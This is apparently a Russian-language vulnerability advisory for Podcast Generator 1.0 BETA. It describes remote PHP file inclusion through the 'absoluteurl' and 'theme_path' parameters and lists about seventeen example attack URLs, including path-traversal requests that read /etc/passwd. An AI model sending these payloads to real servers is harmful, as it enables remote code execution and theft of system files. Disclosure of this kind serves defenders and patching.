Программа: Podcast Generator 1.0 BETA
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «absoluteurl» и «theme_path» различными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение опции "register_globals" в конфигурационном файле PHP.
Пример:
/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=shell
/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=shell
/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=shell
/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=shell
/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=shell
/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=shell
/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=shell
/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=shell
/podcastgen1.0beta2/core/admin/login.php?absoluteurl=shell
/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=shell
/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=shell
/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=shell
/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=shell
/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=shell
/podcastgen1.0beta2/core/recent_list.php?absoluteurl=shell
/podcastgen1.0beta2/core/themes.php?theme_path=../../../../../../../../../etc/passwd%00
/podcastgen1.0beta2/download.php?filename=../../../../../../../../../etc/passwd
